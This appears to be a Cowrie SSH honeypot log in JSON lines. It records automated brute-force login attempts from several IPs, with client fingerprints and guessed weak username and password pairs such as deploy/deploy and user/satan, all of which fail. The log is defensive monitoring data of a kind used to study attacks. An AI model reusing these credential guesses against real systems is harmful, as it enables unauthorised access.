{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:54:02.431765Z","src_ip":"185.93.89.7","session":"132cac2fd655"}
{"eventid":"cowrie.login.failed","username":"index","password":"444444","message":"login attempt [index/444444] failed","sensor":"my-vps","timestamp":"2025-08-28T09:54:02.500818Z","src_ip":"185.93.89.7","session":"132cac2fd655"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":39682,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb9061fc64eb","protocol":"ssh","message":"New connection: 51.79.164.132:39682 (1.2.3.4:22) [session: bb9061fc64eb]","sensor":"my-vps","timestamp":"2025-08-28T09:54:03.046284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:54:03.229145Z","src_ip":"51.79.164.132","session":"bb9061fc64eb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:54:03.230433Z","src_ip":"51.79.164.132","session":"bb9061fc64eb"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:54:03.521924Z","src_ip":"185.93.89.7","session":"132cac2fd655"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-28T09:54:05.305703Z","src_ip":"51.79.164.132","session":"bb9061fc64eb"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:54:06.719069Z","src_ip":"51.79.164.132","session":"bb9061fc64eb"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":51544,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc93adb876f5","protocol":"ssh","message":"New connection: 185.93.89.7:51544 (1.2.3.4:22) [session: fc93adb876f5]","sensor":"my-vps","timestamp":"2025-08-28T09:54:27.384583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:54:27.385487Z","src_ip":"185.93.89.7","session":"fc93adb876f5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:54:27.403126Z","src_ip":"185.93.89.7","session":"fc93adb876f5"}
{"eventid":"cowrie.login.failed","username":"index","password":"1234abcd","message":"login attempt [index/1234abcd] failed","sensor":"my-vps","timestamp":"2025-08-28T09:54:27.446958Z","src_ip":"185.93.89.7","session":"fc93adb876f5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:54:28.471831Z","src_ip":"185.93.89.7","session":"fc93adb876f5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43386,"dst_ip":"1.2.3.4","dst_port":22,"session":"0acb1fae8a9d","protocol":"ssh","message":"New connection: 51.79.164.132:43386 (1.2.3.4:22) [session: 0acb1fae8a9d]","sensor":"my-vps","timestamp":"2025-08-28T09:54:29.780446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:54:30.011577Z","src_ip":"51.79.164.132","session":"0acb1fae8a9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:54:30.012254Z","src_ip":"51.79.164.132","session":"0acb1fae8a9d"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-28T09:54:33.603983Z","src_ip":"51.79.164.132","session":"0acb1fae8a9d"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:54:35.367157Z","src_ip":"51.79.164.132","session":"0acb1fae8a9d"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":40318,"dst_ip":"1.2.3.4","dst_port":22,"session":"25e8ec5da04d","protocol":"ssh","message":"New connection: 185.93.89.7:40318 (1.2.3.4:22) [session: 25e8ec5da04d]","sensor":"my-vps","timestamp":"2025-08-28T09:54:51.494247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:54:51.501490Z","src_ip":"185.93.89.7","session":"25e8ec5da04d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:54:51.519873Z","src_ip":"185.93.89.7","session":"25e8ec5da04d"}
{"eventid":"cowrie.login.failed","username":"index","password":"8675309","message":"login attempt [index/8675309] failed","sensor":"my-vps","timestamp":"2025-08-28T09:54:51.592632Z","src_ip":"185.93.89.7","session":"25e8ec5da04d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:54:52.638623Z","src_ip":"185.93.89.7","session":"25e8ec5da04d"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33234,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed1620147236","protocol":"ssh","message":"New connection: 51.79.164.132:33234 (1.2.3.4:22) [session: ed1620147236]","sensor":"my-vps","timestamp":"2025-08-28T09:54:56.233766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:54:56.490137Z","src_ip":"51.79.164.132","session":"ed1620147236"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:54:56.501519Z","src_ip":"51.79.164.132","session":"ed1620147236"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:54:59.672862Z","src_ip":"51.79.164.132","session":"ed1620147236"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:55:00.885285Z","src_ip":"51.79.164.132","session":"ed1620147236"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":63793,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4fb48e1a2e3","protocol":"ssh","message":"New connection: 80.94.95.15:63793 (1.2.3.4:22) [session: e4fb48e1a2e3]","sensor":"my-vps","timestamp":"2025-08-28T09:55:05.113114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:55:05.114007Z","src_ip":"80.94.95.15","session":"e4fb48e1a2e3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:55:05.180410Z","src_ip":"80.94.95.15","session":"e4fb48e1a2e3"}
{"eventid":"cowrie.login.failed","username":"user","password":"satan","message":"login attempt [user/satan] failed","sensor":"my-vps","timestamp":"2025-08-28T09:55:05.529117Z","src_ip":"80.94.95.15","session":"e4fb48e1a2e3"}
{"eventid":"cowrie.login.failed","username":"user","password":"hudson","message":"login attempt [user/hudson] failed","sensor":"my-vps","timestamp":"2025-08-28T09:55:06.597863Z","src_ip":"80.94.95.15","session":"e4fb48e1a2e3"}
{"eventid":"cowrie.login.failed","username":"user","password":"commando","message":"login attempt [user/commando] failed","sensor":"my-vps","timestamp":"2025-08-28T09:55:07.669160Z","src_ip":"80.94.95.15","session":"e4fb48e1a2e3"}
{"eventid":"cowrie.login.failed","username":"user","password":"bones","message":"login attempt [user/bones] failed","sensor":"my-vps","timestamp":"2025-08-28T09:55:08.737400Z","src_ip":"80.94.95.15","session":"e4fb48e1a2e3"}
{"eventid":"cowrie.login.failed","username":"user","password":"bangkok","message":"login attempt [user/bangkok] failed","sensor":"my-vps","timestamp":"2025-08-28T09:55:09.805189Z","src_ip":"80.94.95.15","session":"e4fb48e1a2e3"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:55:10.873074Z","src_ip":"80.94.95.15","session":"e4fb48e1a2e3"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":49938,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac7a99af8dfc","protocol":"ssh","message":"New connection: 185.93.89.7:49938 (1.2.3.4:22) [session: ac7a99af8dfc]","sensor":"my-vps","timestamp":"2025-08-28T09:55:17.762725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:55:18.437683Z","src_ip":"185.93.89.7","session":"ac7a99af8dfc"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:55:18.439078Z","src_ip":"185.93.89.7","session":"ac7a99af8dfc"}
{"eventid":"cowrie.login.failed","username":"index","password":"hello1","message":"login attempt [index/hello1] failed","sensor":"my-vps","timestamp":"2025-08-28T09:55:19.267743Z","src_ip":"185.93.89.7","session":"ac7a99af8dfc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:55:20.289528Z","src_ip":"185.93.89.7","session":"ac7a99af8dfc"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":42542,"dst_ip":"1.2.3.4","dst_port":22,"session":"3eb487fba997","protocol":"ssh","message":"New connection: 51.79.164.132:42542 (1.2.3.4:22) [session: 3eb487fba997]","sensor":"my-vps","timestamp":"2025-08-28T09:55:23.542218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:55:23.620641Z","src_ip":"51.79.164.132","session":"3eb487fba997"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:55:24.006646Z","src_ip":"51.79.164.132","session":"3eb487fba997"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:55:25.636260Z","src_ip":"51.79.164.132","session":"3eb487fba997"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:55:27.205445Z","src_ip":"51.79.164.132","session":"3eb487fba997"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":33140,"dst_ip":"1.2.3.4","dst_port":22,"session":"927075e32894","protocol":"ssh","message":"New connection: 185.93.89.7:33140 (1.2.3.4:22) [session: 927075e32894]","sensor":"my-vps","timestamp":"2025-08-28T09:55:43.966335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:55:43.967277Z","src_ip":"185.93.89.7","session":"927075e32894"}
